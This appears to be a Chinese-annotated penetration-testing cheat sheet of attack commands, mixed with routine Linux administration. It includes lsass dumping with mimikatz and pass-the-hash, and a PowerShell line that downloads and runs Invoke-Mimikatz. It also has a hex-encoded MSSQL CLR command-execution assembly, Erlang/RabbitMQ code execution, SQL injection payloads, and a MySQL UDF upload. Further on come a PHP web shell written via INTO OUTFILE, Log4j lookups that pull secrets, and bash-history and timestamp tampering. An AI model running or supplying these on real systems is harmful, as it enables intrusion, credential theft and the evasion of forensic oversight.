procdump.exe -accepteula -ma lsass.exe lsass.dmp	//32系统转储内存
procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp	//64系统转储内存
mimikatz.exe "sekurlsa::minidump lsass.dmp" "log" "sekurlsa::logonpasswords"	//通过转储内存文件获取密码
mimikatz.exe "privilege::debug" "sekurlsa::pth /user:Administrator /domain:remoteserver /ntlm:{NTLM_hash} \"/run:mstsc.exe /restrictedadmin\""	//mimikatz传递哈希
mimikatz.exe "privilege::debug" "sekurlsa::pth /user:Administrator /domain:remoteserver /aes256:{aes256_hmac} \"/run:mstsc.exe /restrictedadmin\""	//mimikatz传递AES-KEY
PowerShell IEX (New-Object System.Net.Webclient).DownloadString(‘https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1’) ; Invoke-Mimikatz -DumpCreds	//远程加载mimikatz

uname -a //查看内核/操作系统/CPU信息
cat /etc/issue //查看操作系统版本
cat /proc/version	//查看系统版本
cat /proc/cpuinfo //查看CPU信息
hostname //查看计算机名
userdel -r user	//删除用户并清除home目录
runlevel //查看运行级别
lsusb -tv //列出所有USB设备
env //查看环境变量
updatedb	//更新locate的默认数据库增加索引 
pinky //当前已登陆用户
sudo -l	//当前用户可以以root身份执行的命令
curl ifconfig.me	//获取本机外网ip地址
curl https://ip.cn	//获取本机外网ip地址
cat /etc/ppp/chap-secrets	//获取vpn服务pptp账号密码
strings /usr/sbin/sshd | grep /
strings /usr/sbin/sshd | grep password 	//查看ssh后门记录路径文件
rpm -qV pam	//centos rpm校验已安装pam包是否被修改
cat /etc/psa/.psa.shadow	//显示Plesk管理员密码
tail -n 100 error_log	//显示该文件的最新100行
tail -f access_log	//实时查看该文件更新
pkill -kill -t tty	//强制踢掉登录用户tty
cat /etc/network/interfaces	//查看网卡信息
pwgen	//复杂密码随机生成工具
apt-get install net-tools	//debian新版默认没有ifconfig、netstat需要安装net-tools包
ip a	//debian新版查看ip命令
apt-get install geany	//Geany编辑器
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}'	//列出所有超级用户帐户
sed -i 's/#Port 22/Port 42318/' /etc/ssh/sshd_config	//替换sshd服务端口
cat /etc/shells	//有效登录shell的路径名
cat /etc/resolv.conf	//显示配置的DNS服务器地址
[space]set +o history	//[space] 表示空格。并且由于空格的缘故，该命令本身也不会被记录。
[Space]set -o history	//它将环境恢复原状，也就是你完成了你的工作，执行上述命令之后的命令都会出现在历史中。
export ALL_PROXY=socks5://127.0.0.1:1080	//只对当前终端有效，强制命令走socks5代理
grep -r -l -i -I passw /	//查找其中包含字符串“ passw”的文件
find /etc/ -readable -type f 2>/dev/null	//列出我们可以阅读的配置文件
find /var/log -readable -type f 2>/dev/null 	//列出我们可以阅读的日志文件
cut -d: -f1 /etc/passwd	//获取当前账户列表
7z a -t7z -r -mx=9 xxx.7z dir/	//7z极限压缩
rpm -q --qf "%{NAME}-%{VERSION}-%{RELEASE}.%{ARCH}\n" pam	//通过使用rpm 的--qf或 --queryformat选项，可以分别输出这些字段和其他字段pam-1.1.8-9.el7.x86_64
dpkg-query -W -f='${Package}-${Version}-${Architecture}\n' libpam-modules-bin	//通过使用dpkg-query的-W和-f或--showformat选项，可以分别输出这些字段和其他字段libpam-modules-bin-1.3.1-5-amd64
grep -nv 'root' /etc/passwd	//过滤出不带有某个关键词的行并输出行号
lsof -u root	//查看某个用户启动了什么进程
lsof -i:8080	//某个端口是哪个进程打开的
netstat -anp	//a参数是列出所有连接，n是不要解析机器名，p列出进程名
ps -ef | grep tomcat	//查看tomcat进程
netstat -anop | grep 5517	//根据进程号查看tomcat端口号

netstat -antp
ps auxef
while true; do netstat -antp | grep [ip]; done 
ll /proc/[pid]/exe	//查找进程文件
strace -tt -T -e trace=all -p [pid]	//跟踪异常进程运行情况
lsof-p [pid]	//查看进程打开的文件
grep "Accepted " /var/log/secure* | awk '{print $1,$2,$3,$9,$11}'	//查看登录成功的日期、用户名及ip
find /etc/ /usr/bin/ /usr/sbin/ /bin/ /usr/local/bin/ /var/spool/cron/ -type f -mtime -1 | xargs ls -l
awk -F ":" '$3==0{print $1}' /etc/passwd	//查找特权用户
awk '/\$1|\$6/{print $1}' /etc/shadow	//查找可以远程登录的账号信息
cat /etc/sudoers | grep -v "^#\|^$" | grep "ALL=(ALL)"	//查找sudo权限账户
grep "Failed password" /var/log/secure | awk {'print $9'} | sort | uniq -c | sort -nr	//查看爆破用户名字典 
cat /etc/rc.local
service –status-all
chkconfig --list	//确认是否有异常开机启动项 
grep -rn "[ip]" * /	//查找关键字
ps -ef | grep sshd	//跟踪SSHD进程
strace -o sshd.strace -f -p [pid]	//跟踪异常进程运行情况,并输出到sshd.strace
cat sshd.strace	//查看异常进程情况
strings -td /lib/x86_64-linux-gnu/security/pam_unix.so	//pam_unix.so文件字符串检查

ifconfig	//查看所有网络接口的属性
iptables -L	//查看防火墙设置
route -n	//查看路由表
netstat -lntp	//查看所有监听端口
netstat -antp	//查看所有已经建立的连接
netstat -s	//查看网络统计信息

find . -name '*.php' -mmin -60	//检查60分钟内当前目录中.PHP文件被修改过的文件
find . -name '*.php' -mtime 0	//查找当前目录中24小时内修改过的PHP文件,这个比较常用于网页文件的检查，是否有被修改的痕迹。
find . -name "[A-Z]*" -print	//查找当前目录中以有大写字母开头的文件
find /www -name "vps*" -print	//查找www目录中以vps开头的文件
find . -perm 777 -print	//查到当前目录中具有777权限的文件
find . -size +1000000c -print	//查找当前目录中文件字节数大于1MB的文件
find -type f -mtime -3	//最近3天修改过的文件
find -type f -ctime -3	//最近3天创建的文件

ls -lZ xxx	//查看安全上下文
chcon --reference=ssl.conf httpd.conf	//使用ssl.conf安全上下文用于httpd.conf

yum -y install lrzsz	//安装
rz filename		//上传
sz filename 	//下载

ssh-keygen	//在本地服务器上生成密钥对
ssh-copy-id -i ~/.ssh/id_rsa.pub UserName@RemoteServer	//在远程服务器上安装公钥,SSH公钥保存在远程Linux服务器的.ssh/authorized_keys文件中
ssh [email protected] -i ~/.ssh/id_rsa	//id_rsa免密登陆,修改id_rsa权限chmod 600 id_rsa

whereis	//命令搜索程序名
which	//命令是查找命令是否存在，以及命令的存放位置在哪儿

nohup /usr/local/node/bin/node /www/im/chat.js >> /usr/local/node/output.log 2>&1 &	//不挂断地运行命令,在后台运行

chattr +i /etc/fstab	//开启文件或目录的该项属性
chattr -i /etc/fstab	//关闭文件或目录的该项属性
lsattr passwd			//查看文件属性
s---ia-------e-- passwd
chattr -isa /etc/passwd	//关闭文件sai属性

who /var/log/wtmp

stat tgs.txt	//命令查看当前文件的时间戳
touch -d "2012-10-19 12:12:12.000000000 +0530" tgs.txt	//使用字符串来更改时间
touch -r tgs.txt a.txt 	//使用tgs.txt文件的访问和修改时间戳更新文件a.txt的时间戳

<space>命令	//在命令前放置一个空格，它不会保存在Bash历史记录中
history -cw	//清除所有Bash历史记录
history -dw 352	//从Bash历史记录文件中删除某一行(例如352)
history -r	//仅清除当前会话的Bash历史记录
export HISTSIZE=0	//禁用当前会话的所有历史记录
export HISTFILE=/dev/null	//丢弃当前会话的所有历史记录
export HISTSIZE=0;export HISTFILE=/dev/null;set +o history
[space]set +o history	//单次会话中禁用某一段命令记录
[Space]set -o history	//单次会话中启用某一段命令记录

proxychains nmap -sT -PN -n -sV -p 80,443,21,22 217.xx.xx.xx

tar -zcvf  test.tar.gz  /home/test/ --ignore-failed-read	//直接打包tar.gz
tar -xvf  test.tar.gz	//解压缩tar.gz
tar --exclude /home/public_html/img -zcvf test.tar.gz  /home/public_html/	//排除目录img
tar -tvf test.tar.gz | more	//列出tar.gz压缩包内容
tar czvf test.tar.gz --exclude=\*.{jpg,gif,png,wmv,flv,tar.gz,zip} /home/me	//排除多个特定文件类型
tar -zcvf /tmp/test.tar.gz -X exclude.txt /home/me	//排除多目录或特定文件类型
cat exclude.txt	//附加文件名
abc
xyz
*.bak

yum install -y unzip gcc make libpcap-devel
wget https://github.com/robertdavidgraham/masscan/archive/master.zip
unzip master.zip && cd masscan*
make && make install && cd ../ && rm -rf master.zip masscan*
或
sudo apt-get install -y unzip gcc make libpcap-dev
wget https://github.com/robertdavidgraham/masscan/archive/master.zip
unzip master.zip && cd masscan*
sudo make && sudo make install && cd ../ && rm -rf master.zip masscan*

masscan -p6379 --max-rate 400000 192.168.0.1/24 |awk '{print $6}'

wget http://www.unixwiz.net/tools/nbtscan-source-1.0.35.tgz -O /tmp/nbtscan.tgz && mkdir /tmp/nbtscan && rm -rf nbtscan.tgz && tar -xvzf nbtscan.tgz -C /tmp/nbtscan && cd /tmp/nbtscan && make && ./nbtscan
wget https://ftp.tu-chemnitz.de/pub/linux/dag/redhat/el7/en/x86_64/rpmforge/RPMS/nbtscan-1.5.1-1.2.el7.rf.x86_64.rpm && rpm -ivh nbtscan-1.5.1-1.2.el7.rf.x86_64.rpm && rm -rf nbtscan-1.5.1-1.2.el7.rf.x86_64.rpm

;开启mssql CLR功能
sp_configure 'clr enabled', 1
GO
RECONFIGURE
GO
;数据库标记为安全的程序集
ALTER DATABASE master SET TRUSTWORTHY ON;
;导入程序集
CREATE ASSEMBLY [evilclr]
    AUTHORIZATION [dbo]
    FROM 0x4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000504500004C01030068BBB65D0000000000000000E00022200B013000000E000000060000000000004E2C0000002000000040000000000010002000000002000004000000000000000400000000000000008000000002000000000000030040850000100000100000000010000010000000000000100000000000000000000000FC2B00004F00000000400000A002000000000000000000000000000000000000006000000C000000C42A00001C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000000000002E74657874000000540C000000200000000E000000020000000000000000000000000000200000602E72737263000000A0020000004000000004000000100000000000000000000000000000400000402E72656C6F6300000C0000000060000000020000001400000000000000000000000000004000004200000000000000000000000000000000302C00000000000048000000020005007C220000480800000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000CA00280600000A72010000706F0700000A00280600000A7243000070725300007002280800000A28020000066F0700000A002A001B300600BC0100000100001173040000060A00730900000A0B076F0A00000A026F0B00000A0003280C00000A16FE010D092C0F00076F0A00000A036F0D00000A0000076F0A00000A176F0E00000A00076F0A00000A176F0F00000A00076F0A00000A166F1000000A00076F0A00000A176F1100000A00076F0A00000A176F1200000A0006731300000A7D010000040706FE0605000006731400000A6F1500000A00140C00076F1600000A26076F1700000A00076F1800000A6F1900000A0C076F1A00000A0000DE18130400280600000A11046F1B00000A6F0700000A0000DE00076F1C00000A16FE01130511052C1D00280600000A067B010000046F1D00000A6F0700000A000038AA00000000731300000A130608280C00000A16FE01130711072C0B001106086F1E00000A2600067B010000046F1F00000A16FE03130811082C22001106725D0000706F1E00000A261106067B010000046F1D00000A6F1E00000A2600280600000A1C8D0E000001251602A2251703A225187275000070A22519076F1C00000A13091209282000000AA2251A72AD000070A2251B1106252D0426142B056F1D00000AA2282100000A6F0700000A0000067B010000046F1D00000A130A2B00110A2A011000000000970025BC0018080000012202282200000A002A4E027B01000004046F2300000A6F1E00000A262A00000042534A4201000100000000000C00000076322E302E35303732370000000005006C000000A8020000237E000014030000B003000023537472696E677300000000C4060000B4000000235553007807000010000000234755494400000088070000C000000023426C6F620000000000000002000001571502000902000000FA0133001600000100000014000000030000000100000005000000050000002300000005000000010000000100000003000000010000000000CC0101000000000006006601B60206008601B60206003C01A3020F00D602000006003803D8010A0050014E020E001103A3020600DF01D80106002002760306002101B6020E00F602A3020A0082034E020A0019014E020600BA01D8010E00F701A3020E00C800A3020E003502A30206000802360006001502360006002700D801000000002D00000000000100010001001000E5020000150001000100030110000100000015000100040006006C037900502000000000960083007D00010084200000000096008F001A0002005C220000000086189D02060004005C220000000086189D0206000400652200000000830016008200040000000100750000000100E800000002002703000001002E02000002000C0309009D02010011009D02060019009D020A0031009D02060051009D02060061001001100069009A001500710031031A0039009D0206003900E90132007900DB0015007100A003370079001903150079008D033C007900B80041007900A4013C00790083023C00790051033C0049009D02060089009D02470039005E004D0039004B0353003900F1000600390071025700990079005C0039003F0306004100AC005C0039009F0060002900B8015C004900050164004900C1016000A100B8015C00710031036A0029009D02060059004C005C0020002300BA002E000B0089002E00130092002E001B00B10063002B00BA00200004800000000000000000000000000000000069020000020000000000000000000000700055000000000002000000000000000000000070004000000000000200000000000000000000007000D80100000000030002000000003C3E635F5F446973706C6179436C617373315F30003C52756E436F6D6D616E643E625F5F3000496E743332003C4D6F64756C653E0053797374656D2E494F0053797374656D2E44617461006765745F44617461006D73636F726C6962006164645F4F757470757444617461526563656976656400636D640052656164546F456E640045786563436F6D6D616E640052756E436F6D6D616E640053656E64006765745F45786974436F6465006765745F4D657373616765007365745F57696E646F775374796C650050726F6365737357696E646F775374796C65007365745F46696C654E616D650066696C656E616D6500426567696E4F7574707574526561644C696E6500417070656E644C696E65006765745F506970650053716C5069706500436F6D70696C657247656E6572617465644174747269627574650044656275676761626C654174747269627574650053716C50726F63656475726541747472696275746500436F6D70696C6174696F6E52656C61786174696F6E734174747269627574650052756E74696D65436F6D7061746962696C697479417474726962757465007365745F5573655368656C6C4578656375746500546F537472696E67006765745F4C656E677468006576696C636C722E646C6C0053797374656D00457863657074696F6E006765745F5374617274496E666F0050726F636573735374617274496E666F0053747265616D526561646572005465787452656164657200537472696E674275696C6465720073656E646572004461746152656365697665644576656E7448616E646C6572004D6963726F736F66742E53716C5365727665722E536572766572006576696C636C72006765745F5374616E646172644572726F72007365745F52656469726563745374616E646172644572726F72002E63746F720053797374656D2E446961676E6F73746963730053797374656D2E52756E74696D652E436F6D70696C6572536572766963657300446562756767696E674D6F6465730053746F72656450726F63656475726573004461746152656365697665644576656E744172677300617267730050726F63657373007365745F417267756D656E747300617267756D656E747300436F6E636174004F626A6563740057616974466F7245786974005374617274007365745F52656469726563745374616E646172644F7574707574007374644F75747075740053797374656D2E546578740053716C436F6E74657874007365745F4372656174654E6F57696E646F770049734E756C6C4F72456D707479000000004143006F006D006D0061006E0064002000690073002000720075006E006E0069006E0067002C00200070006C006500610073006500200077006100690074002E00000F63006D0064002E00650078006500000920002F0063002000001753007400640020006F00750074007000750074003A0000372000660069006E00690073006800650064002000770069007400680020006500780069007400200063006F006400650020003D00200000053A00200000001E897910CE56A742B9629E72009C5099000420010108032000010520010111110400001235042001010E0500020E0E0E11070B120C121D0E0212210212250202080E042000123D040001020E0420010102052001011141052002011C180520010112450320000204200012490320000E0320000805200112250E0500010E1D0E08B77A5C561934E08903061225040001010E062002011C122D0801000800000000001E01000100540216577261704E6F6E457863657074696F6E5468726F7773010801000701000000000401000000000000000068BBB65D00000000020000001C010000E02A0000E00C0000525344534FDE46A4C9F4284FAAE5619111BF655C01000000453A5C636F64655C6373686172705C6576696C636C725C6576696C636C725C6F626A5C44656275675C6576696C636C722E70646200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000242C000000000000000000003E2C0000002000000000000000000000000000000000000000000000302C0000000000000000000000005F436F72446C6C4D61696E006D73636F7265652E646C6C0000000000FF2500200010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100100000001800008000000000000000000000000000000100010000003000008000000000000000000000000000000100000000004800000058400000440200000000000000000000440234000000560053005F00560045005200530049004F004E005F0049004E0046004F0000000000BD04EFFE00000100000000000000000000000000000000003F000000000000000400000002000000000000000000000000000000440000000100560061007200460069006C00650049006E0066006F00000000002400040000005400720061006E0073006C006100740069006F006E00000000000000B004A4010000010053007400720069006E006700460069006C00650049006E0066006F0000008001000001003000300030003000300034006200300000002C0002000100460069006C0065004400650073006300720069007000740069006F006E000000000020000000300008000100460069006C006500560065007200730069006F006E000000000030002E0030002E0030002E003000000038000C00010049006E007400650072006E0061006C004E0061006D00650000006500760069006C0063006C0072002E0064006C006C0000002800020001004C006500670061006C0043006F00700079007200690067006800740000002000000040000C0001004F0072006900670069006E0061006C00460069006C0065006E0061006D00650000006500760069006C0063006C0072002E0064006C006C000000340008000100500072006F006400750063007400560065007200730069006F006E00000030002E0030002E0030002E003000000038000800010041007300730065006D0062006C0079002000560065007200730069006F006E00000030002E0030002E0030002E00300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C000000503C00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
    WITH PERMISSION_SET = UNSAFE;
go
;创建存储过程
CREATE PROCEDURE [dbo].[ExecCommand]
@cmd NVARCHAR (MAX)
AS EXTERNAL NAME [evilclr].[StoredProcedures].[ExecCommand]
go
;执行命令
exec dbo.execcommand 'whoami'

erl -sname test //连接到test节点

net_kernel:connect('rabbit@WIN-PM0ID6F0AHN'). //连接到群集（命令末尾的重要终止符的句点）
erlang:spawn('rabbit@WIN-PM0ID6F0AHN',os,cmd,["calc.exe"]). //代码执行（当然是起始计算）
os:cmd("whoami"). //代码执行
init:stop().  //退出Erlang Shell是使用init:stop函数完成的

鎈'"\(
'and(select*from(select+sleep(3))a/**/union/**/select+1)='
(select*from(select+sleep(2)union/**/select+1)a)

sqlmap/extra/cloak	//sqlmap安装目录/extra/cloak下

Usage: ./cloak.py [-d] -i <input file> [-o <output file>]

Options:
  --version      show program's version number and exit
  -h, --help     show this help message and exit
  -d             Decrypt
  -i INPUTFILE   Input file
  -o OUTPUTFILE  Output file

sqlmap --headers="Host:www.baidu.com\nUser-Agent:baidu.com"

sqlmap --force-ssl --delay 10

sqlmap -u "https://x.x.x.x/index.php?id=1" --tamper unmagicquotes --dbs

pip install PyMySQL	//-d 参数所需依赖

sqlmap -d "mysql://admin:[email protected]:3306/testdb" --sql-shell	//连接数据库执行sql语句,查询数据库插件路径

show variables like "%plugin%"; 或 select @@plugin_dir;

sqlmap -d "mysql://admin:[email protected]:3306/testdb" --file-write=/lib_mysqludf_sys.so --file-dest=/usr/lib/mysql/plugin/	//上传lib_mysqludf_sys.so到MySQL插件目录

sqlmap -d "mysql://admin:[email protected]:3306/testdb" --sql-shell	//激活存储过程「sys_exec」函数，执行系统命令

CREATE FUNCTION sys_exec RETURNS STRING SONAME lib_mysqludf_sys.so
 
SELECT * FROM information_schema.routines
 
sys_exec(id);

SELECT @@VERSION;	//查看msyql版本
SELECT @@hostname;	//查看数据库主机名
SELECT user,password,host FROM mysql.user;	//查看数据库用户密码和连接地址
SELECT schema_name FROM information_schema.schemata;	//查看数据库
SELECT * from mysql.user where user = substring_index(user(), '@', 1) ;	//查询当前数据库用户权限
SELECT id,name,password,secret_key from admin_db.user_xxxx where is_delete = 0;	//指定条件查询数据
SELECT table_schema,COUNT(table_name) FROM information_schema.TABLES GROUP BY table_schema	//统计所有库下的表个数
SELECT table_schema,GROUP_CONCAT(table_name) FROM  information_schema.tables GROUP BY table_schema;	//查询整个数据库中所有库和所对应的表信息

SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA	获取所有数据库名
SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA WHERE SCHEMA_NAME = DATABASE()  获取当前数据库
SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='sqlinjection'	获取指定数据库表名
SELECT TABLE_NAME,TABLE_ROWS FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='sqlinjection'	获取指定数据库表名和表统计
SELECT TABLE_NAME,COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='sqlinjection'	获取指定数据库表名和字段名
SELECT COUNT(*) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA = 'sqlinjection' 获取指定数据库表名计数
SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='sqlinjection' and TABLE_NAME='members' 指定数据库表名获取字段
SELECT username,password FROM sqlinjection.members	获取指定数据库、表、字段信息
SELECT username,password FROM sqlinjection.members LIMIT 0,1	获取指定数据库、表、字段信息,限制查询条数

sqlmap -u "https://x.x.x.x/index.php?id=1" --sql-query "select id,name,password,secret_key from admin_db.user_xxxx where is_delete = 0" -o	//指定条件查询数据select 字段 from 数据库名.表名 where 判断 = 条件
sqlmap -u "https://x.x.x.x/index.php?id=1" --sql-query "UPDATE admin_db.user_xxxx SET is_delete=0 WHERE id=3" -o	//UPDATE 数据库名.表名 SET 字段名=值 WHERE 判断=条件
sqlmap -u "https://x.x.x.x/index.php?id=1" --sql-query "INSERT INTO admin_db.admin_xxxx_ip (ip,memo,time,operator) VALUES('127.0.0.1', '365',1554515620,943)"	//插入新数据

SELECT name FROM master..sysdatabases	//查询数据库
SELECT name FROM master..sysobjects WHERE xtype='U'	//查询表明
SELECT Name FROM SysColumns Where id=Object_Id('TableName')	//获取字段名
SELECT name FROM master..syscolumns WHERE id = (SELECT id FROM master..syscolumns WHERE name = 'tablename'	//查字段名
SELECT TOP 1 * FROM 数据库..表名	//查看数据库中表的一条记录

python ws-harness.py -h	//帮助
python ws-harness.py -u ws://dvws.local:8080/authenticate-user-prepared -m a.txt	//-u 远程websocket地址 -m 包含WebSocket消息模板的文件，把[FUZZ]放在需要注入的注入点
python sqlmap.py -u "http://localhost:8000/?fuzz=test" --dbs --tamper base64encode.py	//DVWS模拟websocket注入

<form enctype="multipart/form-data" action="upload.php" method="POST"><input name="uploadedfile" type="file"/><input type="submit" value="Upload File"/></form> <?php $target_path=basename($_FILES['uploadedfile']['name']);if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'],$target_path)){echo basename($_FILES['uploadedfile']['name'])." has been uploaded";}else{echo "Error!";}?>

SELECT 0x3c666f726d20656e63747970653d226d756c7469706172742f666f726d2d646174612220616374696f6e3d2275706c6f61642e70687022206d6574686f643d22504f5354223e3c696e707574206e616d653d2275706c6f6164656466696c652220747970653d2266696c65222f3e3c696e70757420747970653d227375626d6974222076616c75653d2255706c6f61642046696c65222f3e3c2f666f726d3e0d0a3c3f70687020247461726765745f706174683d626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d293b6966286d6f76655f75706c6f616465645f66696c6528245f46494c45535b2775706c6f6164656466696c65275d5b27746d705f6e616d65275d2c247461726765745f7061746829297b6563686f20626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d292e2220686173206265656e2075706c6f61646564223b7d656c73657b6563686f20224572726f7221223b7d3f3e INTO OUTFILE "/home/relax/public_html/upload.php";

${docker:containerId}
${docker:containerName}
${docker:imageId}
${docker:imageName}
${docker:shortContainerId}
${docker:shortImageId}
${env:USER}
${env:user}
${env:COMPUTERNAME}
${env:USERDOMAIN}
${env:AWS_SECRET_ACCESS_KEY}
${hostName}
${env:JAVA_VERSION}
${java:version}
${java:runtime}
${java:vm}
${java:os}
${java:locale}
${java:hw}
${k8s:accountName}
${k8s:clusterName}
${k8s:containerId}
${k8s:containerName}
${k8s:host}
${k8s:hostIp}
${k8s:labels.app}
${k8s:labels.podTemplateHash}
${k8s:masterUrl}
${k8s:namespaceId}
${k8s:namespaceName}
${k8s:podId}
${k8s:podIp}
${k8s:podName}
${k8s:imageId}
${k8s:imageName}
${main:0}
${main:1}
${main:2}
${main:3}
${main:4}
${main:bar}
${web:attr.name}
${web:contextPath}
${web:contextPathName}
${web:effectiveMajorVersion}
${web:effectiveMinorVersion}
${web:initParam.name}
${web:majorVersion}
${web:minorVersion}
${web:rootDir}
${web:serverInfo}
${web:servletContextName}
${sys:logPath}
${sys:java.version}
${sys:java.vendor}
${date:MM-dd-yyyy}
${ctx:loginId}
${bundle:application:spring.activemq.password}
${bundle:application-druid:spring.datasource.password}
${bundle:application:spring.datasource.password}


https://docs.spring.io/spring-boot/docs/current/reference/html/application-properties.html
application.properties site:github.com redis
application.yaml
application-druid.yml

mgr.site.url
mgr.site.url
mch.site.url
isv.site.url
mbr.site.url
redis.pass
redis.pass
redis.ip
master.datasource.username
master.datasource.password
master.datasource.url
slave.datasource.url
slave.datasource.username
slave.datasource.password
db.mysqlUrl
db.password
db.username

^(.*\.)?google\.(com|com\.hk)$

{
    "proxy":{
        "ssl_pass_through":{
            "apply_to_out_of_scope_items":true,
            "automatically_add_entries_on_client_ssl_negotiation_failure":false,
            "rules":[
                {
                    "enabled":true,
                    "host":"^.*\\.adspower\\.(com|net)$",
                    "protocol":"any"
                },
                {
                    "enabled":true,
                    "host":"^.*\\.cloudflare\\.com$",
                    "protocol":"any"
                },
                {
                    "enabled":true,
                    "host":"^.*\\.doubleclick\\.net$",
                    "protocol":"any"
                },
                {
                    "enabled":true,
                    "host":"^.*\\.google-analytics\\.com$",
                    "protocol":"any"
                },
                {
                    "enabled":true,
                    "host":"^(.*\\.)?google\\.(com|cn|com\\.hk)$",
                    "protocol":"any"
                },
                {
                    "enabled":true,
                    "host":"^.*\\.googleadservices\\.com$",
                    "protocol":"any"
                },
                {
                    "enabled":true,
                    "host":"^.*\\.googleapis\\.com$",
                    "protocol":"any"
                },
                {
                    "enabled":true,
                    "host":"^.*\\.googletagmanager\\.com$",
                    "protocol":"any"
                },
                {
                    "enabled":true,
                    "host":"^(.*\\.)?gstatic\\.com$",
                    "protocol":"any"
                },
                {
                    "enabled":true,
                    "host":"^.*\\.jsdelivr\\.net$",
                    "protocol":"any"
                },
                {
                    "enabled":true,
                    "host":"^(.*\\.)?youtube\\.com$",
                    "protocol":"any"
                },
                {
                    "enabled":true,
                    "host":"^.*\\.ytimg\\.com$",
                    "protocol":"any"
                },
                {
                    "enabled":true,
                    "host":"^cdn\\.jsdelivr\\.net$",
                    "protocol":"any"
                },
                {
                    "enabled":true,
                    "host":"^cdnjs\\.cloudflare\\.com$",
                    "protocol":"any"
                },
                {
                    "enabled":true,
                    "host":"^unpkg\\.com$",
                    "protocol":"any"
                },
                {
                    "enabled":true,
                    "host":"^code\\.jquery\\.com$",
                    "protocol":"any"
                }
            ]
        }
    }
}

strings heapdump | grep -B 2 -A 2 "eyJ"
strings heapdump | grep -B 2 -A 2 "AKIA"
strings heapdump | grep -E "^Host:\s+\S+$" -C 10
strings heapdump | grep -E "AKIA|eyJ"
strings heapdump | grep -i "Cookie:"
strings heapdump | grep -iE "password|token|secret|key|cred|hash|authorization|pwd|passwd|db_url|ldap|jdbc|connection"

docker pull git.xxx.com/cpg/frontend:latest  //拉取镜像
docker images  //查看本地所有镜像
docker inspect <镜像名称或ID>  //查看镜像的详细信息,根据diff目录查看配置文件
docker image prune -a  //删除所有未被使用的镜像
docker rmi $(docker images -q)  //强制删除所有镜像